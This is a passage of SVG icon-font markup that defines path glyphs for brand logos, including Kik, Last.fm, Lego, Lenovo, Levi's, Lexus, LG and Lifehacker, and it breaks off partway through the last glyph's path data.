<glyph glyph-name="brand-kik" horiz-adv-x="1000" unicode="&#xe8f7;" d="M942 355c-31 0-57-25-57-57 0-32 26-57 57-57s58 25 58 57-26 57-58 57z m-463 56h-1c0 0 0 1 0 1 0 29-23 53-51 53-29 0-52-24-52-53l0-1h0l0-259h0c1-29 24-52 52-52s51 23 51 52h1l0 259z m-174-229l-95 127 68 67-1 0c9 10 14 22 14 36 0 29-23 53-52 53-15 0-29-7-38-18l0 1-97-95 0 192h-1c0 1 0 2 0 3 0 29-22 52-51 52-28 0-51-23-51-52l0-2h-1v-393h1l0-1c0-29 23-52 51-52 27 0 49 22 51 49h1v68l26 24 86-115c9-15 26-26 45-26 28 0 51 24 51 53 0 10-3 20-8 28l1 1z m551 0l-94 127 67 67 0 0c9 10 14 22 14 36 0 29-23 53-52 53-15 0-29-7-38-18l0 1-97-95 0 192h-1c0 1 0 2 0 3 0 29-23 52-51 52s-51-23-51-52l0-2h-1v-393h1l0-1c0-29 23-52 51-52 27 0 49 22 51 49h1v68l26 24 86-115c9-15 25-26 44-26 29 0 52 24 52 53 0 10-3 20-8 28l0 1z" />
<glyph glyph-name="brand-lastfm" horiz-adv-x="1000" unicode="&#xe8f8;" d="M800 53c-104 1-159 52-198 143l-11 24-95 219c-31 77-110 129-198 129-120 0-216-98-216-218s96-218 216-218c83 0 156 47 192 117l38-89c-54-67-137-110-230-110-165 0-298 134-298 300 0 166 133 300 298 300 124 0 224-67 275-185 4-9 54-127 98-227 27-62 50-103 125-106 73-2 123 43 123 99 0 56-38 69-103 91-116 39-177 78-177 171 0 90 62 151 161 151 65 0 112-29 145-87l-64-33c-24 34-51 47-84 47-47 0-80-33-80-76 0-62 54-71 131-97 104-34 152-72 152-169 0-102-87-176-200-176z" />
<glyph glyph-name="brand-lego" horiz-adv-x="1000" unicode="&#xe8f9;" d="M836 579c-44 0-83-12-115-38-26 27-65 39-117 39-40 0-74-9-104-27-21 17-47 28-87 28-36 0-88-2-126-35-9 18-27 32-77 32-46 0-84-21-109-62-33-53-103-205-101-288 1-62 48-105 116-107 41-1 76 8 102 25 24-17 55-26 89-26 41 0 77 11 105 30 24-20 57-30 93-30 48 0 92 16 128 47 24-31 66-47 116-47 95 0 144 58 181 134 14 29 40 99 45 138 5 46 11 91-21 135-22 31-60 52-118 52z m116-147c-1-36-13-78-21-103-38-112-83-183-186-183-47 0-90 18-107 65-31-40-79-65-132-65-42-1-74 14-94 39-24-27-65-39-106-39-36 0-67 13-87 35-22-23-57-35-102-34-57 1-89 36-90 84-2 73 68 226 97 272 20 33 48 49 85 49 20 0 41-4 54-17 11-11 12-21 13-40 33 52 87 59 137 59 39 0 70-14 84-36 26 22 63 36 107 36 45 0 79-11 100-35 5-5 8-9 13-18 25 30 64 52 119 52 95 0 120-63 116-121z m23 148c-14 0-25-11-25-25v0c0-14 10-24 24-24h0c14 0 26 10 26 25 0 14-11 24-25 24z m-1-46c-11 0-20 9-20 21s9 20 20 20c11 0 21-9 21-20 0-12-9-21-21-21z m-139 11c-47 0-85-16-113-49l-7-9-5 10c-4 9-7 12-11 17-19 22-51 33-95 33-40 0-77-13-103-34l-6-6-5 7c-12 20-42 33-77 33-50 0-100-7-131-56l-13-20-1 24c0 18-2 26-11 35-9 10-25 15-48 15-34 0-60-15-79-46-28-46-98-196-96-268 1-47 32-75 83-76 42-1 75 9 97 31l5 5 5-5c19-21 48-32 82-32 43 0 79 13 100 36l6 6 5-6c20-25 51-37 88-37 50 0 96 23 127 62l8 10 4-12c19-52 71-60 101-60 99 0 142 68 179 178 9 27 19 68 21 101 1 25-2 59-26 84-18 20-46 29-84 29z m-685-274c53 10 67-10 65-28-5-53-54-65-97-64-31 1-58 15-59 51-1 62 63 208 93 256 14 23 30 34 57 34 26 0 32-13 32-29-1-42-69-170-91-220z m173 49c-3-9-10-29-15-50 17 4 30 7 53 7 26-1 42-12 42-33 0-51-57-66-96-66-43 0-81 24-81 72 0 55 30 139 58 195 35 69 70 78 131 78 26 0 57-12 57-37 0-35-29-48-59-50-12-1-32-1-43-1 0 0-10-15-21-41 55 8 78-5 69-36-12-43-49-46-95-38z m329-5c-15-76-70-137-147-137-52 0-85 29-85 82 0 39 19 99 34 134 32 75 66 127 151 127 52 0 92-18 86-66-4-35-22-56-54-59-9 0-46 1-33 35 4 12 6 22-12 22-15 0-25-9-32-19-16-23-50-112-55-148-4-25 7-30 19-30 19 0 40 20 47 53 0 0-36 1-26 33 10 31 28 38 58 39 60 2 54-42 49-66z m263 75c-9-45-29-99-52-138-36-65-79-74-118-74-38 1-81 15-81 74-1 42 18 102 33 141 27 71 55 129 142 128 102-1 84-92 76-131z m63 163v0c4 0 7 3 7 7 0 4-2 6-8 6h-13v-25h7v11h0c2 0 3 0 4-1 1-1 3-4 3-6l3-4h4v0l-2 6c-3 4-1 5-5 6z m-3 3h-4v7h3c4 0 6-1 6-3 0-2-1-4-5-4z m-146-105c-9 0-17-1-24-12-15-20-60-143-59-167 0-9 5-17 16-17 12 0 19 9 25 19 14 24 54 133 55 160 1 8-1 17-13 17z" />
<glyph glyph-name="brand-lenovo" horiz-adv-x="1000" unicode="&#xe8fa;" d="M569 379c-60 0-100-19-111-52-4-12-2-22 4-30 11-13 35-20 71-20 59 0 100 19 110 53 4 12 3 22-4 29-10 13-35 20-70 20z m6-52c-8-23-17-32-33-32-7 0-13 2-16 6-4 5-4 14 1 29 7 22 16 31 33 31 7 0 12-2 15-6 5-5 4-14 0-28z m419 32c-11 13-35 20-71 20-59 0-100-19-110-52-4-12-3-22 4-30 10-13 35-20 70-20 60 0 100 19 111 53 4 12 2 22-4 29z m-65-32c-7-23-16-32-33-32-7 0-12 2-15 6-5 5-5 14 0 29 7 22 17 31 33 31 7 0 12-2 16-6 4-5 4-14-1-28z m-883 96c-1-3-45-139-46-143h65c1 3 44 138 46 143h-65z m725-47c-1-2-52-67-52-67s-8 64-8 67h-60c0-4 12-93 12-96h98c1 2 70 91 73 96h-63z m-595-80c-11 0-17 1-22 5-5 3-3 8-3 8s114 24 116 25c1 2 2 6 2 10 0 7-2 13-6 18-9 11-30 17-62 17-58 0-97-19-108-52-4-13-3-24 3-32 13-16 45-18 62-18 47 0 70 8 75 9 0 1 10 22 11 27-9-4-43-19-68-17z m-16 48c4 12 16 20 32 20 11 0 17-4 19-7 2-3 4-7 3-13l-61-28 7 28z m293 20c-8 10-34 15-77 15-31 0-61-4-84-8 0 0-30-89-31-91h66c0 1 27 81 27 81 23 1 30-1 33-5 2-2 3-4 2-7l-23-69h65l25 74c1 4-1 7-3 10z" />
<glyph glyph-name="brand-levis" horiz-adv-x="1000" unicode="&#xe8fb;" d="M1000 577c-4 0-7 0-11 0h-989v-4c6-12 7-26 10-39 28-133 57-266 85-400 1-7 2-9 9-5 129 64 259 57 388 1 7-3 12-3 19 0 63 28 129 43 198 43 67 0 130-14 188-49 1-1 2-1 4-1 9 41 18 83 27 124l72 328c0 0 0 1 0 2z m-737-273c-5-7-18-2-28-2-34 0-68 0-102-1-7 0-10 2-9 10 0 22 0 44 0 65 0 22 0 44 0 66-1 7 2 9 8 9 14-1 27-1 41 0 6 0 7-3 7-9 0-31 0-62 0-94 0-7 2-9 9-9 22 1 45 0 67 1 7 0 10-1 9-8-1-10 4-22-2-28z m175 71c-1-7-3-8-9-8-11 0-22 0-33 0h-12c-16 0-31 0-47 0-6 0-8-1-7-7 2-13 10-23 21-26 16-4 31 1 38 12 2 3 4 5 8 5 11-1 23-1 34 0 6 0 7-2 5-7-5-20-17-34-36-40-28-10-56-10-84-1-34 12-53 44-48 83 5 42 31 66 75 69 13 1 26 0 39-3 35-10 57-41 56-77z m171 67c-21-44-43-88-63-133-3-6-7-8-13-8-13 1-28-4-37 2-8 7-11 21-17 32-19 38-37 76-57 117 21 0 41-1 60 0 6 0 6-4 8-8 12-26 24-52 36-79 3 4 5 8 6 11 11 23 21 45 31 68 3 6 6 8 12 8 12-1 24 0 36 0 1-5-1-7-2-10z m69-133c0-6-1-7-7-7-14 0-28 0-42 0-6 0-8 2-7 7 0 23 0 45 0 68s0 45 0 68c-1 5 1 7 7 7 14 0 28 0 42 0 5 0 7-2 7-7 0-45 0-91 0-136z m51 135c0-9-17-27-26-27 1 4 2 8 3 11 4 12 4 12-8 14-3 1-5 1-5 5v3c1 8-4 21 2 25 8 4 20 1 31 1 4 0 3-3 3-6 1-8 1-17 0-26z m134-132c-18-11-38-13-59-13-14 0-29 1-42 7-17 7-27 18-29 37-1 5 0 7 6 7 11-1 23-1 34 0 4 0 6-1 7-5 5-14 27-20 38-12 4 3 5 6 5 10-1 4-4 6-8 7-11 4-23 5-34 8-7 1-15 3-21 6-32 15-36 55-8 76 26 19 79 20 106 3 9-6 16-14 19-26 2-6 1-8-6-8-6 1-13 0-19 0-8 0-16-1-22 8-5 8-27 9-36 3-2-1-5-3-4-7 0-4 3-6 6-8 9-4 19-4 28-6 10-2 21-4 31-8 15-6 26-16 28-33 2-19-4-35-20-46z m-504 110c0 1-1 1-1 1-12 2-21-3-25-16 0-2-1-4-1-5 0 0 0-1 0-1l0-1c0 0 0-1 0-1-1 0-1-1 0-1 0-4 3-4 11-4l10-1h16c3 0 5 1 5 5v2c0 10-6 20-15 22z" />
<glyph glyph-name="brand-lexus" horiz-adv-x="1000" unicode="&#xe8fc;" d="M733 679l-21-31c152-72 214-166 214-298 1-35-8-73-31-109h-446c-26 0-30 30-20 47 39 70 80 132 127 196 45 60 89 116 136 175 12 17 4 32-21 37-52 11-106 19-172 19-365 0-499-210-499-365 0-169 135-365 500-365 203 0 335 66 412 150h-77c-68-62-183-106-335-106-309 0-423 173-423 323 2 134 124 318 431 324 11 0 20-10 12-20-52-65-202-273-219-300-32-52-35-77-36-94-1-16-1-45 25-70 45-39 108-33 163-33h458c20 0 25 6 36 20 37 56 53 117 53 171 0 116-75 263-267 329z" />
<glyph glyph-name="brand-lg" horiz-adv-x="1000" unicode="&#xe8fd;" d="M500 850c-276 0-500-224-500-500s224-500 500-500c276 0 500 224 500 500s-224 500-500 500z m119-680v-39h-139v438h40v-399h99z m177-116c-79-79-184-122-296-122-112 0-217 43-296 122-79 79-123 184-123 296 0 231 188 419 419 419 5 0 15 0 20-1v-39c-5 1-16 1-20 1-101 0-197-40-269-112-71-71-111-166-111-268s40-197 112-268c71-72 167-111 268-111 201 0 365 156 378 354 1 0 1 5 1 5h-259v39h298v-19c0-112-43-217-122-296z m-396 456c0-33-27-60-60-60s-60 27-60 60c0 33 27 60 60 60 33 0 60-27 60-60z" />
<glyph glyph-name="brand-life-hacker" horiz-adv-x="1000" unicode="&#xe8fe;" d="M750 337l-1 1 43 72 1 3 1 1h-27l-2-3-26-43-12-20c0-1-1-2-1-3l-1 0c0-1 0-1 0-1 0-1 0-1 0-1l-1 0c0 0 0 0 0-1 0 0 0 0 0 0l0-1 0 0c-1 0-1 0-1-1 0 0 0 0 0 0 0 0 0 0 0 0 0-1 0-1 0-1 0 0 0 0 0 0v-1c0-1 0-1 0-1 0 0 0 0 0 0 0-1 0-1 0-1 0 0 0 0 0 0 1-1 1-3 2-4l1 0c0-1 0-1 0-2l45-78h26l-46 83-1 2z m-53 144v-229h23v231h-23z m298-69c-1 1-3 1-5 2 0 0-1 0-1 0h0l-2 1c0 0 0 0 0 0l-1 0h0c-3 1-6 1-9 1h-1c-1 0-2 0-3 0l-1 0c0 0-1 0-1 0l-1 0-2-1-1 0-1 0c0 0-1 0-1 0l0 0-2-1 0 0c-1 0-2 0-3 0 0 0 0 0 0-1 0 0 0 0 0 0-1 0-2 0-3-1 0 0 0 0 0 0l-3-1 0 0-1-1c0 0-1 0-2-1h0l0 0c-1 0-1-1-2-1 0 0 0 0 0 0 0 0-1 0-1-1 0 0 0 0-1-1 0 0 0 0 0 0 0 0 0 0 0 0l-2-1c0 0 0 0 0 0l-2-2-1 0c0-1 0-1-1-2l0 0 0 0c-1 0-1-1-1-1 0 0-1 0-1-1l0 0c-1-1-1-1-2-2l0 0c0-1-1-1-1-1 0 0 0-1 0-1 0 0 0 0 0 0s0 0 0 0l-2-2 0 0 0-2-1 0c0 0 0 0 0 0 0-1 0-1 0-1 0 0-1-1-1-1 0-1 0-1 0-1 0 0 0 0 0 0l-1-1c0 0 0-1 0-1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0-1 0-1-1 0-1-1-1-1 0-1 0-1 0-1-1 0-1-1-1-2 0 0 0 0 0 0s0 0 0 0l-1-2v-1c0-1 0-2 0-3 0 0 0 0 0 0-1-1-1-1-1-2 0 0 0 0 0 0 0 0 0 0 0-1 0 0 0-1 0-2v0c0-1 0-2 0-3v-116h24v116c0 7 3 14 7 19 1 0 1 0 2 1 0 0 0 0 1 1 3 2 6 4 9 4l1 0c1 0 2 0 2 0l26 0c0 4 0 8 0 12 0 1 0 1 0 1v1c1 0 1 1 1 2v0c0 1 0 2 0 2-2 1-3 2-5 2z m-96-40l0 2v0l0 0-1 1c0 0 0 1 0 1 0 0 0 0 0 1 0 0 0 1 0 1l0 1-1 1 0 0 0 1c0 0 0 1 0 1l0 0c0 1 0 1 0 1-1 0-1 0-1 0l0 2c0 0 0 0 0 0-1 1-1 1-1 2l0 1-1 1c0 0 0 0 0 0 0 1-1 2-1 2 0 1 0 1 0 1-1 1-1 1-2 2 0 0 0 1 0 1 0 0-1 1-1 2 0 0 0 0-1 0l0 0-1 2-1 1c0 1-1 1-2 2l0 0 0 0c-1 1-1 1-2 2l0 0c0 0 0 0-1 1 0 0 0 0 0 0 0 0-1 1-2 1 0 0 0 0 0 1-1 0-2 1-2 1l-1 1 0 0c-1 0-1 1-2 1 0 0 0 0 0 0-1 0-1 0-1 0-1 1-1 1-2 1 0 1 0 1 0 1l-1 0c0 0-1 0-1 0-1 1-1 1-1 1l-1 0c0 0-1 1-2 1l-1 0c-1 0-1 1-2 1l-1 0c-1 0-2 0-3 0l0 1-3 0-1 0h0c-1 0-2 0-3 0h0c0 0-1 0-2 0l-1 0c0 0-1 0-1 0-1 0-1 0-1 0l-1-1c-1 0-1 0-1 0l-1 0c0 0 0 0-1 0l0 0c0 0-1 0-1 0 0 0-1-1-1-1-1 0-1 0-1 0l-1 0c-1 0-1 0-1-1h-1c0 0 0 0 0 0l-1 0c0 0 0 0-1 0 0-1 0-1-1-1 0 0 0 0-1 0 0 0 0 0-1-1l0 0c0 0 0 0-1 0 0 0 0-1-1-1l-1 0c0 0 0-1-1-1 0 0 0 0-1 0 0 0 0-1-1-1 0 0 0 0-1 0l0-1-1 0 0-1c-1 0-1 0-1 0-1-1-1-1-1-1l-1-1c0 0 0 0-1 0 0-1 0-1-1-1 0-1 0-1 0-1 0 0 0 0 0 0-1 0-1-1-1-1l-1-1 0-1-1 0 0-1c-1 0-1 0-1 0l0 0c0-1 0-1 0-1 0 0-1 0-1 0l0-1s0 0 0 0c0 0-1-1-1-1 0 0 0 0 0 0l0-1c0 0 0 0 0 0-1 0-1 0-1-1 0 0 0 0 0 0 0-1 0-1 0-1 0 0-1 0-1 0 0 0 0 0 0-1 0 0 0 0 0 0l-1-1c0 0 0 0 0 0 0 0 0 0 0-1l-1-1c0 0 0 0 0 0v0c0 0 0 0 0 0l0-1v0l-1-1 0-1 0-1c0-1-1-1-1-1 0-1 0-2 0-2v-1c-1 0-1-1-1-1l0-1v0c0-1 0-1 0-2l0-1v0l-1-1s0-1 0-1c0 0 0-1 0-1v0c0-1 0-2 0-3v-73c0-1 0-2 0-3 0 0 0-1 0-1 0-1 1-1 1-2 0 0 0 0 0-1l0-2c0-1 0-1 0-1l1-2 0-1c0-1 0-2 1-2 0-1 0-1 0-1l1-2 0-1c0-1 1-2 1-2 0-1 0-1 0-1 1 0 1-1 1-2l1 0c0 0 0 0 0-1 0 0 0-1 1-1 0 0 0-1 0-1 0 0 1-1 1-2l1 0 1-2 0-1c1 0 1 0 1-1l1 0c0-1 1-2 2-2 0 0 0 0 0 0l1-2c1 0 1 0 1 0 0-1 1-1 1-2 1 0 1 0 1 0l2-1 0 0c1-1 1-1 2-2 0 0 0 0 0 0l2-1c1 0 1 0 1 0l2-1c0 0 0 0 0 0l2-1 1 0c1 0 1-1 2-1 0 0 0 0 1 0 0 0 1 0 2 0 0 0 0 0 0 0 1-1 2-1 3-1 0 0 0 0 0 0 1 0 2 0 3 0 2 0 5 0 7 1l29 4 0 2c-1 0-1 1-1 1 0 0 0 1 0 1 0 0 0 1 0 1l0 1c0 0 0 0 0 1 0 0 0 0 0 0 0 1 0 1 0 2 0 0 0 0 0 0 0 2 0 4-1 6v0c0 1 0 2 0 3 0 0 0 0 0 0v0h-28l-2 0c0 0 0 0 0 1l-3 0c0 0-1 0-2 0h0c0 0 0 0 0 0-1 1-1 1-2 1 0 0 0 0 0 0-1 1-1 1-2 1l0 0c-1 1-1 1-2 1 0 0 0 0 0 0 0 1-1 1-1 2 0 0 0 0-1 0 0 0-1 1-1 1 0 0 0 0 0 0l-1 2-1 0c0 0 0 1-1 1 0 0 0 1 0 1 0 0 0 0 0 0-1 1-1 1-1 1 0 0 0 0 0 0l-1 2 0 1c0 0 0 1-1 1l0 1c0 0 0 1 0 2l0 0-1 2c0 0 0 0 0 0 0 1 0 2 0 2v26h57c3 0 6 1 9 3 2 2 3 5 3 8v37c0 1 0 2 0 2 0 1 0 1 0 1z m-23-3v-25h-46v25c0 10 7 19 16 22 2 1 4 1 7 1l2 0 1 0c0 0 1 0 1 0 0 0 1 0 1 0l2-1 0 0c0 0 1 0 2-1 0 0 0 0 0 0l1-1c1 0 1 0 1 0 0 0 1 0 1-1l1 0 1-1c0 0 1 0 1-1 0 0 0 0 1-1 0 0 0 0 0 0 1 0 1-1 1-1l1-1c0 0 0-1 1-1l0-1c0 0 1-1 1-1l0-1 1-1c0 0 0 0 0 0 0 0 0 0 0 0 0-1 0-1 0-1 0 0 0 0 0 0 0-1 1-1 1-1l0-2c0 0 0 0 0-1 0 0 1-1 1-1 0 0 0-1 0-1v-2z m-206 2c0 1 0 1 0 2 0 0 0 0 0 1 0 0 0 1 0 1v0l0 1-1 1c0 1 0 1 0 1 0 1 0 1 0 2s0 0 0 1l-1 1v0l0 1c0 0 0 1 0 1 0 0 0 1-1 1l0 0 0 1c0 0 0 1 0 1 0 0-1 0-1 0 0 1 0 1 0 1l0 1c0 0 0 0 0 0-1 1-1 2-2 3 0 0 0 0 0 0 0 1-1 1-1 2 0 0 0 1 0 1-1 0-1 0-1 0l-1 2 0 0c-1 1-1 2-2 3 0 0 0 0 0 0l-2 2 0 0-1 0c0 1-1 2-2 2 0 1 0 1 0 1l-2 1c0 0 0 1 0 1l-1 0c0 0-1 1-2 1 0 1 0 1 0 1-1 0-2 1-3 1 0 0 0 0 0 0-1 1-2 1-3 2l0 0c0 0 0 0 0 0-1 0-1 0-2 1l0 0-1 0c-1 1-2 1-3 1h0c0 0 0 0 0 0-1 1-2 1-3 1 0 0 0 0-1 0 0 0-1 1-2 1 0 0 0 0-1 0 0 0 0 0 0 0 0 0 0 0 0 0l-3 0 0 0c-1 1-2 1-3 1-1 0-1 0-2-1h-1l-1 0h0l-1 0-1 0h0l-1 0c-1 0-1 0-1 0 0 0 0 0-1 0 0 0 0 0 0 0l-1-1-1 0h0c0 0-1 0-1 0 0 0 0 0-1 0l0-1-1 0 0 0-1 0c0 0 0 0 0 0-1-1-1-1-1-1 0 0 0 0 0 0-1 0-1 0-1 0-1 0-1 0-1 0 0 0 0-1 0-1h0c-1 0-1 0-2 0 0 0 0 0 0 0l0 0c-1-1-1-1-2-1l0 0 0-1-2 0c0 0 0 0 0 0 0 0 0-1 0-1h-1l-1-1-1 0-1-1-1-1-1 0-1-1c0 0 0-1-1-1 0 0 0 0 0 0l-1-1-1-1-1-1-1-2c0 0-1 0-1-1 0 0 0-1-1-1 0 0 0 0 0 0 0 0 0-1 0-1l-1-1c0 0 0 0-1-1l0 0-1-1c0-1 0-1 0-1 0 0 0 0 0 0 0-1-1-2-1-2l0-1-1 0c0-1 0-1 0-2 0 0 0 0-1-1v0l0-2c0 0 0 0 0 0-1-1-1-2-1-3l0 0c-1-3-2-7-2-11v-74l1-3c0 0 0 0 0-1l0-2c0 0 0 0 0-1l0-1c0-1 0-1 0-1l1-3c0 0 0 0 0 0l1-3 0 0 1-2 0-1c0-1 0-1 1-2 0 0 0 0 0 0 0-1 1-2 1-3l0 0c0 0 0 0 0 0l2-2 0-1c0 0 1-1 1-2 0 0 1 0 1 0 0-1 1-1 1-2 1 0 1-1 1-1 0 0 1-1 1-1l1-1c0 0 1-1 2-2l0 0c0 0 1-1 2-1l0-1 2-1c0 0 0 0 1-1 0 0 1-1 2-1 0 0 0 0 0 0 1-1 1-1 2-1 0-1 1-1 1-1 0 0 1 0 2-1l0 0c1 0 2-1 3-1 0 0 0 0 0 0l3-1c0 0 0 0 0 0 1 0 2 0 3-1 0 0 0 0 0 0 1 0 2 0 3 0 0 0 0 0 1 0 0 0 1 0 2 0 0 0 0-1 1-1 1 0 2 0 3 0 0 0 1 0 2 0 0 0 0 1 0 1 1 0 1 0 2 0 0 0 1 0 1 0l1 0 1 0c0 0 1 0 1 0 1 0 1 1 1 1l1 0 1 0 1 0 1 1c1 0 1 0 2 0l0 0c1 1 1 1 2 1l0 0 2 1 0 0c1 0 1 1 2 1 0 0 0 0 0 0l1 1 1 0c1 0 1 1 1 1 1 0 1 0 1 0 0 0 1 1 1 1 0 0 1 0 1 0 0 1 0 1 1 1 0 0 0 1 0 1 1 0 1 0 1 0l1 1c0 0 1 1 1 1l1 1 0 0 1 1c0 0 1 1 1 1 0 0 0 0 0 1 1 0 1 0 1 1l1 0c0 1 0 1 1 1 0 1 0 1 0 1l1 1c0 0 0 1 0 1l1 1c1 2 2 3 2 4l1 1c0 0 0 1 0 1 0 1 1 1 1 1 0 0 0 1 0 1 0 0 0 1 0 1l1 1c0 1 0 1 0 1 0 0 0 1 0 1l1 1 0 2 0 0c0 1 0 1 0 2 0 0 0 0 0 1 0 0 0 0 0 0l1 1c0 0 0 1 0 2l0 0 0 1c-1 0-5 0-11 0-2 0-4 1-6 1-2 0-4 0-6 0l-1-1c0-1 0-1 0-1 0-2 0-3-1-5-3-9-12-15-22-15 0 0-1 0-2 0l0 0c-1 1-1 1-2 1 0 0 0 0 0 0-1 0-2 0-2 0 0 0 0 0-1 0h0l-1 1c-1 0-1 0-1 0l-1 1-1 0c0 0-1 1-1 1 0 0 0 0 0 0-1 1-1 1-2 1 0 0 0 0 0 0-1 1-1 1-2 2l0 0-1 1c0 0 0 0 0 1-1 0-1 1-1 1l-1 0c0 1 0 1 0 1v0c0 0 0 1 0 1l-1 0 0 2c-1 0-1 0-1 0l0 2c0 0 0 0 0 0-1 1-1 2-1 2 0 0 0 0 0 1l0 1 0 1c0 1 0 1 0 2v74c0 7 3 13 8 18 4 3 9 5 14 5l2 0 1 0c0-1 1-1 1-1 0 0 1 0 1 0l2 0c0 0 0 0 0 0 0 0 1-1 2-1 0 0 0 0 0 0l2-1 0 0 2-1c0 0 0 0 0 0 0 0 1-1 2-1l0-1c0 0 1 0 1-1 0 0 0 0 1 0 0 0 0-1 1-1 0 0 0 0 0 0l1-2 0 0 1-2c0 0 0 0 1 0 0-1 0-1 0-2 0 0 0 0 0 0 0 0 0 0 0 0l1 0c0-1 0-1 0-1l0-1 0-1c1-1 1-1 1-1 0-1 0-1 0-2 0 0 0 0 0 0 0-1 0-2 0-3v-3c1-1 1-1 2-1h0c1 0 1 0 1 1 1 0 1 0 2 0 0 0 0 0 1 0l2 0h0c3 0 6 0 9 0 1 0 2 0 3 0h0c1 0 2 0 4 0v3c0 1-1 1-1 2 1-1 1-1 1-1z m-124-2c0 0 0 1 0 1s0 1 0 1c0 0 0 0-1 0 0 1 0 1 0 1l0 1 0 1v0c0 1 0 1 0 1 0 0 0 1 0 1 0 0 0 0 0 1 0 0 0 0-1 0 0 0 0 0 0 0 0 1 0 1 0 1 0 0 0 1 0 1l0 1 0 0c-1 0-1 1-1 1 0 0 0 0 0 0l0 1 0 0-1 1c0 1 0 1 0 1l0 1v0c0 1-1 1-1 1l0 1c0 0 0 0 0 1l0 0-1 0c0 1 0 2-1 2 0 1 0 1 0 1 0 0 0 0 0 0 0 1-1 2-1 3 0 0-1 0-1 0 0 1 0 1-1 2 0 0 0 0 0 0 0 0 0 1 0 1-1 0-1 1-2 2l0 0-2 2 0 0c0 1-1 1-1 1 0 0-1 1-1 1l0 0c0 1-1 1-1 1 0 0-1 1-2 2l0 0 0 0c-1 1-2 1-2 2-1 0-1 0-1 0-1 1-2 1-2 1 0 0 0 1 0 1 0 0 0 0-1 0 0 0-1 1-2 1 0 0-1 0-1 0-1 1-1 1-2 1 0 1 0 1 0 1 0 0-1 0-1 0-1 0-2 0-3 1 0 0 0 0 0 0l-1 0c0 0-1 0-2 1 0 0 0 0 0 0 0 0 0 0 0 0l-1 0c-1 0-2 0-3 1v0h0c-1 0-2 0-3 0 0 0 0 0 0 0h-1c0 0 0 0-1 0 0 0-1 0-2 0h-2c-1 0-2 0-4 0h0c-1 0-2 0-4 0 0 0 0 0 0-1l-4 0h0s0 0 0 0l-3-1c-1 0-1 0-1 0l0 0c-2-1-4-1-5-1h0c0 0 0 0 0-1-1 0-2 0-3 0h0l0 0c-1-1-2-1-2-1 0 0-1 0-1 0 0 0 0 0 0 0 0-1-1-1-1-1 0 0 0 0 0 0 0 0-1 0-1 0l0-1v-1c0 0 0 0 0 0 0 0 0-1 0-1 0-1 0-2 0-3l1-2v-1l0 0v-1c0 0 0 0 0 0v-1l0 0v-1c0 0 0 0 0-1 0 0 0 0 0 0v-1c0 0 0 0 0 0 0-1 0-1 0-1 0 0 0 0 0-1 0 0 0 0 0 0v-1c0 0 1-1 1-1 0 0 1 0 1 0l1 0 2 0 2 0c1 0 1 0 2 0l8 1 1 0c1 0 2 0 3 0 0 0 1 0 2 0 0 0 1 0 2 0 0 1 1 1 2 1 0 0 1 0 1 0l4 0h0c1 0 2 0 3 0 1 0 2 0 2 0 0 0 1 0 1 0 0 0 1 0 2 0h0c0-1 1-1 2-1l0 0c1 0 1-1 2-1 0 0 0 0 0 0l2-1c0 0 0 0 0 0 1 0 1-1 1-1l0 0c1 0 1-1 2-1l0 0 1-2c0 0 0 0 0 0l1-1c0 0 0 0 0 0 1-1 1-1 1-2 0 0 0 0 0 0 0 0 1-1 1-1v0s0 0 0-1c0-1 1-3 1-4 0-1 0-1 0-1 0-1 0-1 0-2l0-1c1-1 1-2 1-2v-19l-1 0c0 0 0 0 0 0 0 0 0 0 0 0l-1 1 0 0c0 0 0 0-1 0l0 0c0 0 0 0 0 0 0 0 0 0-1 0l0 0c0 0 0 0 0 0 0 0 0 0-1 0 0 0 0 0 0 0 0 1 0 1-1 1l0 0c0 0-1 0-1 0 0 0 0 0 0 0 0 0-1 0-1 0 0 0 0 0 0 0-1 0-1 0-1 0 0 0-1 0-1 0 0 0 0 0 0 0 0 1 0 1 0 1s-1 0-1 0h0c0 0-1 0-1 0l0 0-1 0c0 0 0 0 0 0 0 0 0 0 0 0-1 0-1 0-2 0h0c0 0-1 0-2 0 0 0 0 0 0 0h0l-2 1h-1c0 0 0 0-1 0h-3c-1 0-1 0-2 0h0l-1-1-1 0c-1 0-1 0-1 0l0 0s-1 0-1 0c0 0-1 0-1 0 0 0 0 0 0 0-1 0-1 0-1 0 0 0 0 0-1 0 0 0 0 0 0 0l-1-1c0 0 0 0-1 0 0 0 0 0 0 0h0c-1 0-1 0-1 0-1 0-1 0-1 0 0 0-1 0-1 0h0l-1-1c0 0 0 0 0 0l-2 0c0 0 0-1 0-1h-1c0 0 0 0-1 0l-1 0c0-1 0-1-1-1 0 0 0 0-1 0 0 0 0 0 0 0l-1-1h0c0 0 0 0-1 0 0 0 0 0 0 0 0 0 0-1-1-1 0 0 0 0 0 0l0 0c-1 0-1-1-1-1l-1 0 0 0 0 0c-1-1-1-1-2-1l0-1 0 0c-1 0-1 0-1-1l-1 0 0 0c0-1-1-1-1-1l0 0c0 0-1 0-1-1 0 0 0 0 0 0l-1-1s0 0 0 0l0 0c0 0 0 0 0 0h0c-1-1-1-1-1-1l0 0 0 0c0 0-1-1-1-1 0 0 0 0-1-1 0 0 0 0 0 0l0 0-1-2c0 0 0 0 0 0l0 0c-1 0-1 0-1 0 0-1 0-1 0-1 0-1-1-1-1-1 0 0 0 0 0 0l0-1v0l-1-1v0c0 0 0-1 0-1 0 0 0 0 0 0v0l-1-1v0c0 0 0 0 0 0 0 0 0-1 0-1 0 0 0 0 0 0 0 0-1-1-1-1 0 0 0-1 0-1 0 0 0 0 0 0 0-1 0-1 0-1v0c-1 0-1-1-1-2 0 0 0 0 0 0 0 0 0 0 0 0l-1-1c0 0 0 0 0-1 0 0 0 0 0 0v0c0-1 0-1 0-1 0 0 0-1 0-1l-1 0v-1l0 0c0 0 0-1 0-1 0 0 0-1 0-1l0-1c0-1 0-1-1-1 0-1 0-1 0-1 0-1 0-2 0-2l0-1c0-1 0-2 0-2v-15l0-3c0 0 0 0 0-1 0 0 0-1 0-1 1-1 1-1 1-1l0-2 0-1 1-3 0 0c0-1 0-1 0-2l1-1 0-2c0 0 1 0 1-1l0-1c1 0 1-1 1-1 0-1 1-1 1-2l0 0c0 0 0 0 0 0l1-2c1-1 1-1 1-1 0-1 1-1 1-2l1 0c0-1 1-2 1-3 0 0 1 0 1 0 0-1 1-1 1-2 0 0 1 0 1 0 0-1 1-1 1-2 1 0 1 0 1 0 0-1 1-1 2-2l0 0 2-2 1 0 2-2c0 0 0 0 0 0 1 0 2-1 2-1 1 0 1 0 1 0l2-1 1-1 2-1c0 0 0 0 1 0 0 0 1 0 2-1 0 0 0 0 0 0l3 0c0-1 0-1 0-1 1 0 